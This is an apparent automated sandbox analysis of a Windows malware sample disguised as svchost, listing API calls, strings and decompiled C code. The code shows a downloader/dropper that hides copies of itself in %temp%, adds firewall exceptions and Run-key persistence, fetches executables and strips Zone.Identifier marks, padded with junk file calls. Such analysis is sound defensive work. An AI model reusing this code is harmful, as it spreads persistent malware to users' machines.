0x00ab1c0c
0x00ab1b10
0x00ab1b15
0x00ab1b18
0x00ab1b63
0x00ab1b63
0x00ab1b72
0x00ab1b7d
0x00ab1b96
0x00ab1ba6
0x00ab1bb1
0x00ab1bbe
0x00ab1bc3
0x00ab1bcb
0x00ab1bff
0x00ab1bcd
0x00ab1bd2
0x00ab1bdf
0x00ab1be4
0x00ab1bed
0x00ab1bef
0x00ab1bef
0x00ab1bf6
0x00000000

APIs

ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000208), ref: 00AB1A11
strlen.MSVCRT ref: 00AB1A1B
mbstowcs.MSVCRT ref: 00AB1A32
rand.MSVCRT ref: 00AB1A3A
rand.MSVCRT ref: 00AB1A4E
wsprintfW.USER32 ref: 00AB1A75
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00AB1A8B
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00AB1ABA
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00AB1AE9
memset.MSVCRT ref: 00AB1B10
InternetReadFile.WININET(00000000,?,00000207,?), ref: 00AB1B32
WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 00AB1B63
CloseHandle.KERNEL32(000000FF), ref: 00AB1B72
Sleep.KERNEL32(000003E8), ref: 00AB1B7D
wsprintfW.USER32 ref: 00AB1B96
DeleteFileW.KERNEL32(?), ref: 00AB1BA6
Sleep.KERNEL32(000003E8), ref: 00AB1BB1
Sleep.KERNEL32(000003E8), ref: 00AB1BD2
DeleteFileW.KERNEL32(?), ref: 00AB1BFF
CloseHandle.KERNEL32(000000FF), ref: 00AB1C0C
InternetCloseHandle.WININET(00000000), ref: 00AB1C19
InternetCloseHandle.WININET(00000000), ref: 00AB1C26
Sleep.KERNEL32(000003E8), ref: 00AB1C31
rand.MSVCRT ref: 00AB1C46
rand.MSVCRT ref: 00AB1C5A
wsprintfW.USER32 ref: 00AB1C81
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 00AB1C9E
wsprintfW.USER32 ref: 00AB1CBA
DeleteFileW.KERNEL32(?), ref: 00AB1CCA
Sleep.KERNEL32(000003E8), ref: 00AB1CD5
Sleep.KERNEL32(000003E8), ref: 00AB1CF6
DeleteFileW.KERNEL32(?), ref: 00AB1D14

Strings

%ls:Zone.Identifier, xrefs: 00AB1B8A
%ls\%d%d.exe, xrefs: 00AB1A69
%ls\%d%d.exe, xrefs: 00AB1C75
%ls:Zone.Identifier, xrefs: 00AB1CAE
%temp%, xrefs: 00AB1A0C
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36, xrefs: 00AB1A86

Memory Dump Source

Source File: 00000001.00000002.1647531107.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.1647519351.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647620065.0000000000AB9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.1647653810.0000000000ABA000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1647686167.0000000000ABB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ab0000_svchost.jbxd

Similarity

API ID: File$Sleep$Internet$CloseDeleteHandlerandwsprintf$Open$CreateDownloadEnvironmentExpandReadStringsWritembstowcsmemsetstrlen
String ID: %ls:Zone.Identifier$%ls:Zone.Identifier$%ls\%d%d.exe$%ls\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
API String ID: 3794597279-225735804
Opcode ID: 7d5d23104f712b5e6e702a3fe743cbb02b7fa07e0208330a08f24780cb6b4261
Instruction ID: 8e8ae7551a9a571579f06c8a59b7dd010c498629a0b244625f865ae5fbe821ab
Opcode Fuzzy Hash: 7d5d23104f712b5e6e702a3fe743cbb02b7fa07e0208330a08f24780cb6b4261
Instruction Fuzzy Hash: 8781FDB5A40314ABD720EBA0DC49FE9733DBB88701F044698F609A20D3DA79DB95CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00AB4437, Relevance: 33.3, APIs: 13, Strings: 6, Instructions: 51
filesleepregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00AB4437() {
				char* _t253;
				long _t254;
				char* _t256;
				long _t257;
				char* _t258;
				long _t259;
				signed int _t262;
				signed char _t267;
				char* _t325;
				long _t326;
				char* _t328;
				long _t329;
				char* _t343;
				signed int _t350;
				signed int _t352;
				signed int _t354;
				signed char _t372;
				int _t374;
				int _t378;
				int _t383;
				void* _t619;
				void* _t620;
				void* _t621;
				void* _t622;
				void* _t623;
				void* _t638;
				void* _t643;

				L0:
				while(1) {
					L0:
					 *(_t619 - 0x10f8) =  *(_t619 - 0x10f8) + 1;
					if( *(_t619 - 0x10f8) >= 3) {
						break;
					}
					L2:
					Sleep(0x1f4);
					 *(_t619 - 0x510) = 0;
					 *((intOrPtr*)(_t619 - 0xa30)) = 0x236e;
					L3:
					while( *(_t619 - 0x510) <  *((intOrPtr*)(_t619 - 0xa30))) {
						 *(_t619 - 0x10fc) = FindWindowA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", 0);
						if( *(_t619 - 0x10fc) == 0) {
							L40:
							if(PathFileExistsW(L"3r37grg73g7e37geg73g7eg73g7e") == 0) {
								L51:
								 *(_t619 - 0x510) =  *(_t619 - 0x510) + 1;
								continue;
							}
							L41:
							DeleteFileA("3r38r38r838r838r388r838r83");
							 *(_t619 - 0x1138) = 0;
							L43:
							while( *(_t619 - 0x1138) < 0x1770) {
								MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
								DeleteFileA("3r38r38r838r838r388r838r83");
								 *(_t619 - 0x1138) =  *(_t619 - 0x1138) + 1;
							}
							Sleep(0x1388);
							 *((intOrPtr*)(_t619 - 0x1134)) = FindWindowA("4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
							if( *((intOrPtr*)(_t619 - 0x1134)) != 0) {
								DeleteFileA("3r38r38r838r838r388r838r83");
								SetForegroundWindow( *(_t619 - 0x10fc));
								SetFocus( *(_t619 - 0x10fc));
								DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
								MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
								Sleep(0xc8);
								CloseWindow( *(_t619 - 0x10fc));
								Sleep(0xfa0);
							}
							 *(_t619 - 0x113c) = 0;
							L49:
							while( *(_t619 - 0x113c) < 0x9c4) {
								DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
								MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
								 *(_t619 - 0x113c) =  *(_t619 - 0x113c) + 1;
							}
							goto L51;
						}
						L5:
						Sleep(0x7d0);
						DeleteFileA("3r38r38r838r838r388r838r83");
						DeleteFileA("3r38r38r838r838r388r838r83");
						Sleep(0x7d0);
						DeleteFileA("3r38r38r838r838r388r838r83");
						MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"w4rr4w4rw4rwr44rr4w4rr44r");
						 *(_t619 - 0x1120) = 0;
						L7:
						while( *(_t619 - 0x1120) < 0x190) {
							Sleep(0xfa0);
							MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
							MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
							Sleep(0xfa0);
							DeleteFileA("3r38r38r838r838r388r838r83");
							 *(_t619 - 0x1120) =  *(_t619 - 0x1120) + 1;
						}
						Sleep(0x3e8);
						DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
						Sleep(0x1770);
						MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
						Sleep(0x1388);
						DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
						 *(_t619 - 0x1114) = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
						DeleteFileW(L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
						if( *(_t619 - 0x1114) == 0) {
							L16:
							Sleep(0x7d0);
							DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
							InternetCloseHandle( *(_t619 - 0x1114));
							DeleteFileA("3r38r38r838r838r388r838r83");
							SetForegroundWindow( *(_t619 - 0x10fc));
							SetFocus( *(_t619 - 0x10fc));
							MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
							CloseWindow( *(_t619 - 0x10fc));
							MoveFileA("3r38r38r838r838r388r838r83", "4tt4t4wwt44t4tw4tw4wt4tw4t");
							 *((intOrPtr*)(_t619 - 0x111c)) = 0x58;
							 *((intOrPtr*)(_t619 - 0x110c)) = 0x42;
							 *((intOrPtr*)(_t619 - 0x1118)) =  *((intOrPtr*)(_t619 - 0x111c)) +  *((intOrPtr*)(_t619 - 0x110c));
							if( *((intOrPtr*)(_t619 - 0x1118)) < 0x1f4) {
								MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
								Sleep(0x1388);
								MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
								 *(_t619 - 0x1128) = FindWindowA("2uu5uii55i5i25i52i5ii2525i5i25i", 0);
								 *(_t619 - 0x1114) = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
								if( *(_t619 - 0x1114) != 0) {
									Sleep(0x1388);
									MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
									 *(_t619 - 0x1108) = InternetOpenUrlA( *(_t619 - 0x1114), "http://www.yandex.ru/", 0, 0, 0, 0);
									if( *(_t619 - 0x1108) != 0) {
										Sleep(0x1388);
										DeleteFileA("3r38r38r838r838r388r838r83");
										MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"nw55n5nww5n5nww5nw5n5n5n5n");
										Sleep(0xfa0);
										DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
									}
									InternetCloseHandle( *(_t619 - 0x1108));
									Sleep(0xdac);
								}
								InternetCloseHandle( *(_t619 - 0x1114));
								Sleep(0x1388);
								if( *(_t619 - 0x1128) != 0) {
									MoveFileA("wgg4gwg4wgw4w4gw4gw4g4wghw4h", "3r38r38r838r838r388r838r83");
									ShowWindow( *(_t619 - 0x1128), 0);
									SetForegroundWindow( *(_t619 - 0x1128));
									DeleteFileA("4tt4t4wwt44t4tw4tw4wt4tw4t");
									Sleep(0xfa0);
									 *(_t619 - 0x1114) = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0);
									if( *(_t619 - 0x1114) != 0) {
										 *(_t619 - 0x1108) = InternetOpenUrlA( *(_t619 - 0x1114), "http://www.yandex.ru/", 0, 0, 0, 0);
										if( *(_t619 - 0x1108) != 0) {
											Sleep(0x1388);
											MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
											Sleep(0x1388);
											DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
										}
										InternetCloseHandle( *(_t619 - 0x1108));
										Sleep(0x1388);
										DeleteFileA("4tt4t4wwt44t4tw4tw4wt4tw4t");
										Sleep(0x3e8);
									}
									InternetCloseHandle( *(_t619 - 0x1114));
								}
							}
							 *((intOrPtr*)(_t619 - 0x1110)) = 0x12fd1;
							 *((intOrPtr*)(_t619 - 0x1100)) = 0x3e7;
							L28:
							while( *((intOrPtr*)(_t619 - 0x1110)) >  *((intOrPtr*)(_t619 - 0x1100))) {
								 *((intOrPtr*)(_t619 - 0x112c)) = FindWindowA("4tt4t4wwt44t4tw4tw4wt4tw4t", 0);
								if( *((intOrPtr*)(_t619 - 0x112c)) != 0) {
									DeleteFileA("3r38r38r838r838r388r838r83");
									MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
									Sleep(0x1388);
									DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
									Sleep(0x1388);
									 *((intOrPtr*)(_t619 - 0x1100)) =  *((intOrPtr*)(_t619 - 0x1100)) + 1;
								}
							}
							if(PathFileExistsA("2uu5uii55i5i25i52i5ii2525i5i25i") != 0) {
								DeleteFileA("3r38r38r838r838r388r838r83");
								Sleep(0x1388);
								DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
								Sleep(0x1f4);
								MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
							}
							 *((intOrPtr*)(_t619 - 0x1104)) = FindWindowA("3r37g37e7g3ge3ge7g37ge737eg", 0);
							if( *((intOrPtr*)(_t619 - 0x1104)) != 0) {
								Sleep(0x1388);
								DeleteFileA("3r38r38r838r838r388r838r83");
								DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
								SetForegroundWindow( *(_t619 - 0x10fc));
								MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
								ShowWindow( *(_t619 - 0x10fc), 1);
								MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
								MoveFileW(L"w4rr4w4rw4rwr44rr4w4rr44r", L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
								Sleep(0xc8);
								CloseWindow( *(_t619 - 0x10fc));
								Sleep(0x1f4);
							}
							 *(_t619 - 0x1130) = 0;
							L38:
							while( *(_t619 - 0x1130) < 0x190) {
								Sleep(0x1388);
								DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
								DeleteFileA("3r38r38r838r838r388r838r83");
								MoveFileW(L"nw55n5nww5n5nww5nw5n5n5n5n", L"w4rr4w4rw4rwr44rr4w4rr44r");
								DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
								 *(_t619 - 0x1130) =  *(_t619 - 0x1130) + 1;
							}
							goto L40;
						}
						L10:
						MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
						Sleep(0x1388);
						DeleteFileW(L"3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m");
						Sleep(0x1770);
						DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
						 *(_t619 - 0x1108) = InternetOpenUrlA( *(_t619 - 0x1114), "http://www.yandex.ru/", 0, 0, 0, 0);
						Sleep(0x7d0);
						if( *(_t619 - 0x1108) == 0) {
							L15:
							InternetCloseHandle( *(_t619 - 0x1108));
							DeleteFileW(L"w4rr4w4rw4rwr44rr4w4rr44r");
							goto L16;
						}
						L11:
						 *(_t619 - 0x1124) = 0;
						L13:
						while( *(_t619 - 0x1124) < 0x190) {
							DeleteFileW(L"3r37grg73g7e37geg73g7eg73g7e");
							Sleep(0x7d0);
							MoveFileW(L"3r37grg73g7e37geg73g7eg73g7e", L"nw55n5nww5n5nww5nw5n5n5n5n");
							Sleep(0xfa0);
							DeleteFileA("3r38r38r838r838r388r838r83");
							 *(_t619 - 0x1124) =  *(_t619 - 0x1124) + 1;
						}
						goto L15;
					}
					Sleep(0x1f4);
					memset(_t619 - 0x418, 0, 0x208);
					ExpandEnvironmentStringsW( *(_t619 +  *(_t619 - 0x10f8) * 4 - 0x1044), _t619 - 0x418, 0x208);
					_t350 = rand();
					asm("cdq");
					_t352 = rand();
					asm("cdq");
					_t354 = rand();
					asm("cdq");
					wsprintfW(_t619 - 0xc38, L"%ls\\%d%d%d", _t619 - 0x418, _t354 % 0x7530 + 0x3e8, _t352 % 0x7530 + 0x3e8, _t350 % 0x7530 + 0x3e8);
					wsprintfW(_t619 - 0xf68, L"%ls\\%ls", _t619 - 0xc38, _t619 - 0xa2c);
					_t620 = _t620 + 0x34;
					if(CreateDirectoryW(_t619 - 0xc38, 0) == 0) {
						L62:
						continue;
					}
					L53:
					Sleep(0x3e8);
					if(CopyFileW(_t619 - 0x758, _t619 - 0xf68, 0) == 0) {
						goto L62;
					}
					L54:
					Sleep(0x3e8);
					wsprintfW(_t619 - 0x9c8, L"%ls:*:Enabled:%ls", _t619 - 0xf68, _t619 - 0x500);
					_t643 = _t620 + 0x10;
					SetFileAttributesW(_t619 - 0xc38, 7);
					SetFileAttributesW(_t619 - 0xf68, 7);
					if(RegOpenKeyExW(0x80000002, L"SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List", 0, 0xf003f, _t619 - 0x75c) == 0) {
						_t383 = wcslen(_t619 - 0x9c8);
						_t643 = _t643 + 4;
						_t118 = _t383 + 2; // 0x2
						RegSetValueExW( *(_t619 - 0x75c), _t619 - 0xf68, 0, 1, _t619 - 0x9c8, _t383 + _t118);
						RegCloseKey( *(_t619 - 0x75c));
					}
					if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0xf003f, _t619 - 0x75c) == 0) {
						_t378 = wcslen(_t619 - 0xf68);
						_t643 = _t643 + 4;
						RegSetValueExW( *(_t619 - 0x75c), _t619 - 0x500, 0, 1, _t619 - 0xf68, _t378 + _t378 + 2);
						RegCloseKey( *(_t619 - 0x75c));
					}
					if(RegOpenKeyExW(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", 0, 0xf003f, _t619 - 0x75c) == 0) {
						_t374 = wcslen(_t619 - 0xf68);
						_t643 = _t643 + 4;
						_t134 = _t374 + 2; // 0x2
						RegSetValueExW( *(_t619 - 0x75c), _t619 - 0x500, 0, 1, _t619 - 0xf68, _t374 + _t134);
						RegCloseKey( *(_t619 - 0x75c));
					}
					_t372 = E00AB2730(_t619 - 0xf68);
					_t620 = _t643 + 4;
					if((_t372 & 0x000000ff) != 1) {
						goto L62;
					} else {
						L61:
						ExitProcess(0);
					}
				}
				L63:
				Sleep(0x1f4); // executed
				_t253 = E00AB27E0(_t619 - 0x7a0);
				_t621 = _t620 + 4;
				_t254 = RegOpenKeyExA(0x80000002, _t253, 0, 0xf003f, _t619 - 0x75c); // executed
				if(_t254 != 0) {
					L69:
					Sleep(0x1f4); // executed
					_t256 = E00AB27E0(_t619 - 0x488);
					_t622 = _t621 + 4;
					_t257 = RegOpenKeyExA(0x80000002, _t256, 0, 0xf003f, _t619 - 0x75c); // executed
					if(_t257 == 0) {
						E00AB27E0(_t619 - 0x1038);
						E00AB27E0(_t619 - 0x770);
						E00AB27E0(_t619 - 0x1020);
						E00AB27E0(_t619 - 0x49c);
						E00AB27E0(_t619 - 0xf80);
						E00AB27E0(_t619 - 0xf94);
						E00AB27E0(_t619 - 0xa14);
						_t622 = _t622 + 0x1c;
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0x1038, 0, 4, _t619 - 0x20c, 4); // executed
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0x770, 0, 4, _t619 - 0x20c, 4); // executed
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0x1020, 0, 4, _t619 - 0x20c, 4); // executed
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0x49c, 0, 4, _t619 - 0x20c, 4); // executed
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0xf80, 0, 4, _t619 - 0x20c, 4); // executed
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0xf94, 0, 4, _t619 - 0x20c, 4); // executed
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0xa14, 0, 4, _t619 - 0x20c, 4); // executed
						RegCloseKey( *(_t619 - 0x75c)); // executed
					}
					Sleep(0x1f4); // executed
					_t258 = E00AB27E0(_t619 - 0x1008);
					_t623 = _t622 + 4;
					_t259 = RegOpenKeyExA(0x80000002, _t258, 0, 0xf003f, _t619 - 0x75c); // executed
					if(_t259 == 0) {
						E00AB27E0(_t619 - 0x1038);
						E00AB27E0(_t619 - 0x770);
						E00AB27E0(_t619 - 0x1020);
						E00AB27E0(_t619 - 0x49c);
						E00AB27E0(_t619 - 0xf80);
						E00AB27E0(_t619 - 0xf94);
						E00AB27E0(_t619 - 0xa14);
						_t623 = _t623 + 0x1c;
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0x1038, 0, 4, _t619 - 0x20c, 4);
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0x770, 0, 4, _t619 - 0x20c, 4);
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0x1020, 0, 4, _t619 - 0x20c, 4);
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0x49c, 0, 4, _t619 - 0x20c, 4);
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0xf80, 0, 4, _t619 - 0x20c, 4);
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0xf94, 0, 4, _t619 - 0x20c, 4);
						RegSetValueExA( *(_t619 - 0x75c), _t619 - 0xa14, 0, 4, _t619 - 0x20c, 4);
						RegCloseKey( *(_t619 - 0x75c));
					}
					Sleep(0x1f4);
					CreateThread(0, 0, E00AB1660, 0, 0, 0); // executed
					Sleep(0x1f4); // executed
					CreateThread(0, 0, E00AB2600, 0, 0, 0); // executed
					Sleep(0x1f4);
					while(1) {
						Sleep(0x64); // executed
						 *(_t619 - 0x1140) = 0;
						while( *(_t619 - 0x1140) < 8) {
							Sleep(0x64); // executed
							 *(_t619 - 0x1144) = 0;
							while( *(_t619 - 0x1144) < 6) {
								Sleep(0x64); // executed
								wsprintfA(_t619 - 0xd40, "%s%s",  *((intOrPtr*)(_t619 +  *(_t619 - 0x1140) * 4 - 0x7c0)),  *((intOrPtr*)(_t619 +  *(_t619 - 0x1144) * 4 - 0x9fc)));
								_t267 = E00AB2A10(_t619 - 0xd40, _t619 +  *(_t619 - 0x1144) * 4 - 0x538); // executed
								_t623 = _t623 + 0x18;
								if((_t267 & 0x000000ff) == 1) {
									E00AB19F0(_t619 - 0xd40);
									_t623 = _t623 + 4;
								}
								 *(_t619 - 0x1144) =  *(_t619 - 0x1144) + 1;
							}
							 *(_t619 - 0x1140) =  *(_t619 - 0x1140) + 1;
						}
						_t262 = rand();
						asm("cdq");
						Sleep(0x2710 + _t262 % 0xea60 * 0x14); // executed
					}
				}
				RegSetValueExA( *(_t619 - 0x75c), E00AB27E0(_t619 - 0x54c), 0, 4, _t619 - 0x20c, 4); // executed
				_t325 = E00AB27E0(_t619 - 0xfe0);
				_t638 = _t621 + 8;
				_t326 = RegOpenKeyExA(0x80000002, _t325, 0, 0xf003f, _t619 - 0x75c); // executed
				if(_t326 != 0) {
					_t343 = E00AB27E0(_t619 - 0xfe0);
					_t638 = _t638 + 4;
					RegCreateKeyExA(0x80000002, _t343, 0, 0, 0, 0x20006, 0, _t619 - 0x75c, 0);
				}
				_t328 = E00AB27E0(_t619 - 0xfe0);
				_t621 = _t638 + 4;
				_t329 = RegOpenKeyExA(0x80000002, _t328, 0, 0xf003f, _t619 - 0x75c); // executed
				if(_t329 == 0) {
					E00AB27E0(_t619 - 0x9e4);
					E00AB27E0(_t619 - 0x4b8);
					E00AB27E0(_t619 - 0xd5c);
					_t621 = _t621 + 0xc;
					RegSetValueExA( *(_t619 - 0x75c), _t619 - 0x9e4, 0, 4, _t619 - 0x20c, 4);
					RegSetValueExA( *(_t619 - 0x75c), _t619 - 0x4b8, 0, 4, _t619 - 0x20c, 4);
					RegSetValueExA( *(_t619 - 0x75c), _t619 - 0xd5c, 0, 4, _t619 - 0x20c, 4);
					RegCloseKey( *(_t619 - 0x75c));
				}
				RegCloseKey( *(_t619 - 0x75c));
				goto L69;
			}

0x00ab4437
0x00ab4437
0x00ab4437
0x00ab4440
0x00ab444d
0x00000000
0x00000000
0x00ab4453
0x00ab4458
0x00ab445e
0x00ab4468
0x00000000
0x00ab4472
0x00ab4491
0x00ab449e
0x00ab4b6e
0x00ab4b7b
0x00ab4c9e
0x00ab4ca7
0x00000000
0x00ab4ca7
0x00ab4b81
0x00ab4b86
0x00ab4b8c
0x00000000
0x00ab4ba7
0x00ab4bbd
0x00ab4bc8
0x00ab4ba1
0x00ab4ba1
0x00ab4bd5
0x00ab4be8
0x00ab4bf5
0x00ab4bfc
0x00ab4c09
0x00ab4c16
0x00ab4c21
0x00ab4c31
0x00ab4c3c
0x00ab4c49
0x00ab4c54
0x00ab4c54
0x00ab4c5a
0x00000000
0x00ab4c75
0x00ab4c86
0x00ab4c96
0x00ab4c6f
0x00ab4c6f
0x00000000
0x00ab4c75
0x00ab44a4
0x00ab44a9
0x00ab44b4
0x00ab44bf
0x00ab44ca
0x00ab44d5
0x00ab44e5
0x00ab44eb
0x00000000
0x00ab4506
0x00ab4517
0x00ab4527
0x00ab4537
0x00ab4542
0x00ab454d
0x00ab4500
0x00ab4500
0x00ab455a
0x00ab4565
0x00ab4570
0x00ab4580
0x00ab458b
0x00ab4596
0x00ab45af
0x00ab45ba
0x00ab45c7
0x00ab46ba
0x00ab46bf
0x00ab46ca
0x00ab46d7
0x00ab46e2
0x00ab46ef
0x00ab46fc
0x00ab470c
0x00ab4719
0x00ab4729
0x00ab472f
0x00ab4739
0x00ab474f
0x00ab475f
0x00ab476f
0x00ab477a
0x00ab478a
0x00ab479d
0x00ab47b6
0x00ab47c3
0x00ab47ce
0x00ab47de
0x00ab47fe
0x00ab480b
0x00ab4812
0x00ab481d
0x00ab482d
0x00ab4838
0x00ab4843
0x00ab4843
0x00ab4850
0x00ab485b
0x00ab485b
0x00ab4868
0x00ab4873
0x00ab4880
0x00ab4890
0x00ab489f
0x00ab48ac
0x00ab48b7
0x00ab48c2
0x00ab48db
0x00ab48e8
0x00ab4908
0x00ab4915
0x00ab491c
0x00ab492c
0x00ab4937
0x00ab4942
0x00ab4942
0x00ab494f
0x00ab495a
0x00ab4965
0x00ab4970
0x00ab4970
0x00ab497d
0x00ab497d
0x00ab4880
0x00ab4983
0x00ab498d
0x00000000
0x00ab4997
0x00ab49b2
0x00ab49bf
0x00ab49c6
0x00ab49d6
0x00ab49e1
0x00ab49ec
0x00ab49f7
0x00ab4a06
0x00ab4a06
0x00ab4a0c
0x00ab4a1b
0x00ab4a22
0x00ab4a2d
0x00ab4a38
0x00ab4a43
0x00ab4a53
0x00ab4a53
0x00ab4a66
0x00ab4a73
0x00ab4a7e
0x00ab4a89
0x00ab4a94
0x00ab4aa1
0x00ab4ab1
0x00ab4ac0
0x00ab4ad0
0x00ab4ae0
0x00ab4aeb
0x00ab4af8
0x00ab4b03
0x00ab4b03
0x00ab4b09
0x00000000
0x00ab4b24
0x00ab4b35
0x00ab4b40
0x00ab4b4b
0x00ab4b5b
0x00ab4b66
0x00ab4b1e
0x00ab4b1e
0x00000000
0x00ab4b24
0x00ab45cd
0x00ab45d7
0x00ab45e2
0x00ab45ed
0x00ab45f8
0x00ab4603
0x00ab4623
0x00ab462e
0x00ab463b
0x00ab46a2
0x00ab46a9
0x00ab46b4
0x00000000
0x00ab46b4
0x00ab463d
0x00ab463d
0x00000000
0x00ab4658
0x00ab4669
0x00ab4674
0x00ab4684
0x00ab468f
0x00ab469a
0x00ab4652
0x00ab4652
0x00000000
0x00ab4658
0x00ab4cb7
0x00ab4ccb
0x00ab4ced
0x00ab4cf3
0x00ab4cf8
0x00ab4d07
0x00ab4d0c
0x00ab4d1b
0x00ab4d20
0x00ab4d42
0x00ab4d65
0x00ab4d6b
0x00ab4d7f
0x00ab4f3f
0x00000000
0x00ab4f3f
0x00ab4d85
0x00ab4d8a
0x00ab4da8
0x00000000
0x00000000
0x00ab4dae
0x00ab4db3
0x00ab4dd3
0x00ab4dd9
0x00ab4de5
0x00ab4df4
0x00ab4e1a
0x00ab4e23
0x00ab4e28
0x00ab4e2b
0x00ab4e49
0x00ab4e56
0x00ab4e56
0x00ab4e7c
0x00ab4e85
0x00ab4e8a
0x00ab4eab
0x00ab4eb8
0x00ab4eb8
0x00ab4ede
0x00ab4ee7
0x00ab4eec
0x00ab4eef
0x00ab4f0d
0x00ab4f1a
0x00ab4f1a
0x00ab4f27
0x00ab4f2c
0x00ab4f35
0x00000000
0x00ab4f37
0x00ab4f37
0x00ab4f39
0x00ab4f39
0x00ab4f35
0x00ab4f44
0x00ab4f49
0x00ab4f64
0x00ab4f69
0x00ab4f72
0x00ab4f7a
0x00ab50e3
0x00ab50e8
0x00ab5103
0x00ab5108
0x00ab5111
0x00ab5119
0x00ab5126
0x00ab5135
0x00ab5144
0x00ab5153
0x00ab5162
0x00ab5171
0x00ab5180
0x00ab5185
0x00ab51a3
0x00ab51c4
0x00ab51e5
0x00ab5206
0x00ab5227
0x00ab5248
